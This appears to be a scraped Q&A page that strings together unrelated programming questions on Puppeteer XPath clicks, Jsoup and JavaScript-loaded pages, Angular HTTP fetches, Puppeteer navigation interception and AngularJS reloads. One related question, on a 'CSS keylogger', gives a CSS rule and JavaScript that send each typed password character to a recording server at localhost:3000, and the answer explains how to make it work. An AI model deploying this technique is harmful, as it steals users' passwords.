Specific xpath is not working in puppeteer js - puppeteer

I have a specific xpath that's not working. I'm waiting for the XPath to appear but for some reason I still can't get it.
Here is the xpath:
I'm using: '//*[#id="settings"]/div[6]/div[2]/div[2]/div/div[3]/div/form/div[4]/div/div[2]/button[contains(text(), "Save")]'
To confirm that this xpath is in the page I go to my console and evaluate it.
$x('//*[#id="settings"]/div[6]/div[2]/div[2]/div/div[3]/div/form/div[4]/div/div[2]/button[contains(text(), "Save")]')
Then I get this:
[button.ml3-sm.mb1-sm.css-17hmqcn.ex41m6f0.primary]
0: button.ml3-sm.mb1-sm.css-17hmqcn.ex41m6f0.primary
My code is as follows:
await page.waitForXPath('//*[#id="settings"]/div[6]/div[2]/div[2]/div/div[3]/div/form/div[4]/div/div[2]/button[contains(text(), "Save")]');
const [setting] = await page.$x('//*[#id="settings"]/div[6]/div[2]/div[2]/div/div[3]/div/form/div[4]/div/div[2]/button[contains(text(), "Save")]');
if(setting) setting.click();
I await for the element. I can visually see it on the page and also like i mentioned above I can evaluate it but the click never fires.
I've also tried this:
setting[0].click().
Any idea what I'm missing?

I suppose your selector is good, especially if you've been able to validate it through Chrome DevTools console.
I think you just need to await the click:
if(setting) await setting.click();
OR (without destructuring use the 1st index on [0])
await setting[0].click();

Related

How do you make a Keylogger with CSS?

input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
const inp = document.querySelector("input");
inp.addEventListener("keyup", (e) => {
inp.setAttribute('value', inp.value)
});
Is what I've found but I don't think it works. How do I do it?
Edit: I realised that the CSS snippet won't work as typing in the input field will not change the value attribute of the html element. A JavaScript function is required to do this. Hence, include the last 3 lines of your snippet in a script tag and then it should work.
The CSS Keylogger was originally a thought experiment as explained in this LiveOverflow video. The snippet you are using is assuming that http://localhost:3000/ is a malicious Web server which records your HTTP requests.
In this case entering "a" on the keyboard (in the input field) would send a request to http://localhost:3000/a (for fetching the background image) which you may intercept as "a" on the Web server. You may write a NodeJS or Python Web server to intercept these requests and get the keystrokes.

Jsoup - hidden div class?

Im trying to scrape a div class but everything I have tried has failed so far :(
Im trying to scrape the element(s):
<a href="http://www.bellator.com/events/d306b5/bellator-newcastle-pitbull-vs-
scope"><div class="s_buttons_button s_buttons_buttonAlt
s_buttons_buttonSlashBack">More info</div></a>
from the website: http://www.bellator.com/events
I tried accessing the list of elements by doing
Elements elements = document.select("div[class=s_container] > li");
but that didnt return anything.
Then i tried accessing just the parent with
Elements elements = document.select("div[class=s_container]");
and that returned two div with classname "s_container", non of which is the one I needed :<
then i tried accessing that ones parent with
Elements elements = document.select("div[class=ent_m152_bellator module
ent_m152_bellator_V1_1_0 ent_m152]");
And that didnt return anything
I also tried
Elements elements = document.select("div[class=ent_m152_bellator]");
because I wasnt sure about the white spaces but it didnt return anything either
Then I tried accessing its parent by
Elements elements = document.select("div#t3_lc");
and that worked, but it returned an element containing
<div id="t3_lc">
<div class="triforce-module" id="t3_lc_promo1"></div>
</div>
which is kinda weird because i cant see that it has that child when i inspect the website in chrome :S
Anyone knows whats going on? I feel kinda lost..
What you see in your web browser is not what Jsoup sees. Disable JavaScript and refresh page to get what Jsoup gets OR press CTRL+U ("Show source", not "Inspect"!) in your browser to see original HTML document before JavaScript modifications. When you use your browser's debugger it shows final document after modifications so it's not not suitable for your needs.
It seems like whole "UPCOMING EVENTS" section is dynamically loaded by JavaScript.
Even more, this section is asynchronously loaded with AJAX. You can use your browsers debugger (Network tab) to see every possible request and response.
I found it but unfortunately all the data you need is returned as JSON so you're going to need another library to parse JSON.
That's not the end of the bad news and this case is more complicated. You could make direct request for the data:
http://www.bellator.com/feeds/ent_m152_bellator/V1_1_0/d10a728c-547e-4a6f-b140-7eecb67cff6b
but the URL seems random and few of these URLs (one per upcoming event?) are included inside JavaScript code in HTML.
My approach would be to get the URLs of these feeds with something like:
List<String> feedUrls = new ArrayList<>();
//select all the scripts
Elements scripts = document.select("script");
for(Element script: scripts){
if(script.text().contains("http://www.bellator.com/feeds/")){
// here use regexp to get all URLs from script.text() and add them to feedUrls
}
}
for(String feedUrl : feedUrls){
// iterate over feed URLs, download each of them
String json = Jsoup.connect(feedUrl).ignoreContentType(true).get().body().toString();
// here use JSON parsing library to get the data you need
}
ALTERNATIVE approach would be to stop using Jsoup because of its limitations and use Selenium Webdriver as it supports dynamic page modifications by JavaScript so you'd get the HTML of the final result - exactly what you see in web browser and Inspector.
If anyone finds this in the future; I managed to solve it with Selenium, dont know if its a good/correct solution but it seems to be working.
System.setProperty("webdriver.chrome.driver", "C:\\Users\\PC\\Desktop\\Chromedriver\\chromedriver.exe");
WebDriver driver = new ChromeDriver();
driver.get("http://www.bellator.com/events");
String html = driver.getPageSource();
Document doc = Jsoup.parse(html);
Elements elements = doc.select("ul.s_layouts_lineListAlt > li > a");
for(Element element : elements) {
System.out.println(element.attr("href"));
}
Output:
http://www.bellator.com/events/d306b5/bellator-newcastle-pitbull-vs-scope
http://www.bellator.com/events/ylcu8d/bellator-215-mitrione-vs-kharitonov
http://www.bellator.com/events/yk2djw/bellator-216-mvp-vs-daley
http://www.bellator.com/events/e8rdqs/bellator-217-gallagher-vs-graham
http://www.bellator.com/events/281wxq/bellator-218-sanchez-vs-grimshaw
http://www.bellator.com/events/8lcbdi/bellator-219-koreshkov-vs-larkin
http://www.bellator.com/events/9rqguc/bellator-macdonald-vs-fitch

Using Angular to get html of a website URL

I am new in Angular
What I am going to try is to get the HTML of a page and reproduce it into an iFrame (it is an exercise).
I am using the following piece of code:
var prova = this._http.get(myUrl, {responseType: "text"}).subscribe((x) =>{
console.log(x);
});
I did it on a website (if is needed I can also insert the name of the pages) and it returns the html only of some pages.
In the other case the string x is empty.
Could it depend on connection?
Or there is some way to wait the end of the get request?
Or simply is wrong my approach and I should make a different type of request?
Your most likely going to need to use a library like puppeteer if you want to render a page properly. Puppeteer is a node library and useless headless chrome so I am not sure how well you could really integrate with Angular.
https://github.com/GoogleChrome/puppeteer

How to intercept request in Puppeteer before current page is left?

Usecase:
We need to capture all outbound routes from a page. Some of them may not be implemented using link elements <a src="..."> but via some javascript code or as GET/POST forms.
PhantomJS:
In Phantom we did this using onNavigationRequested callback. We simply clicked at all the elements defined by some selector and used onNavigationRequested to capture the target url and possibly method or POST data in a case of form and then canceled that navigation event.
Puppeteer:
I tried request interception but at the moment request gets intercepted the current page is already lost so I would have to go back.
Is there a way how to capture the navigation event when the browser is still at the page that triggered the event and to stop it?
Thank you.
You can do the following.
await page.setRequestInterception(true);
page.on('request', request => {
if (request.resourceType() === 'image')
request.abort();
else
request.continue();
});
Example here:
https://github.com/GoogleChrome/puppeteer/blob/master/examples/block-images.js
Available resource types are listed here:
https://github.com/GoogleChrome/puppeteer/blob/master/docs/api.md#requestresourcetype
So I finally discovered the solution that doesn't require browser extension and therefore works in a headless mode:
Thx to this guy: https://github.com/GoogleChrome/puppeteer/issues/823#issuecomment-467408640
page.on('request', req => {
if (req.isNavigationRequest() && req.frame() === page.mainFrame() && req.url() !== url) {
// no redirect chain means the navigation is caused by setting `location.href`
req.respond(req.redirectChain().length
? { body: '' } // prevent 301/302 redirect
: { status: 204 } // prevent navigation by js
)
} else {
req.continue()
}
})
EDIT: We have added helper function to Apify SDK that implements this - https://sdk.apify.com/docs/api/puppeteer#puppeteer.enqueueLinksByClickingElements
Here is whole source code:
https://github.com/apifytech/apify-js/blob/master/src/enqueue_links/click_elements.js
It's slightly more complicated as it does not only need to intercept requests but additionally also catch newly opened windows, etc.
I met the same problems.Puppeteer doesn't support the feature now, actually it's chrome devtool that doesn't support it. But I found another way to solve it, using chrome extension. Related issue: https://github.com/GoogleChrome/puppeteer/issues/823
The author of the issue shared a solution
here. https://gist.github.com/GuilloOme/2bd651e5154407d2d2165278d5cd7cdb
As the doc says, we can use chrome.webRequest.onBeforeRequest.addListener to intercept all request from the page and block it if you wanna do.
Don't forget to add the following command to the puppeteer launch options:
--load-extension=./your_ext/ --disable-extensions-except=./your_ext/
page.setRequestInterception(true); The documentation has a really thorough example here: https://github.com/GoogleChrome/puppeteer/blob/master/docs/api.md#pagesetrequestinterceptionvalue.
Make sure to add some logic like in the example (and below) they avoid image requests. You would capture it and then abort each request.
page.on('request', interceptedRequest => {
if (interceptedRequest.url.endsWith('.png') ||
interceptedRequest.url.endsWith('.jpg'))
interceptedRequest.abort();
else
interceptedRequest.continue();
});

angularjs: best way to force certain link paths to reload

I'd like to be able to catch any link in my site that starts with "/#" and handle with a full browser reload.
Something like:
$locationProvider.html5Mode(true)
$routeProvider.when("/#:id",
# window.location.href = [the link's url]
# all others are handled by typical controller/view
I have been able to solve the problem using an attribute/directive on an anchor tag, but I'd like to do this at the url routing level.
I'm not sure if it's the best solution, but you can set a parameter based on current time instead of the '/#' code
e.g.
{{customer.Name}}
where 'now' is set on $rootScope after each $routeChangeSuccess
$rootScope.$on('$routeChangeSuccess', function (event, current, previous) {
$rootScope.now = Date.now();
});
This might be improved but it's working.
You might also have a look to angularjs - refresh when clicked on link with actual url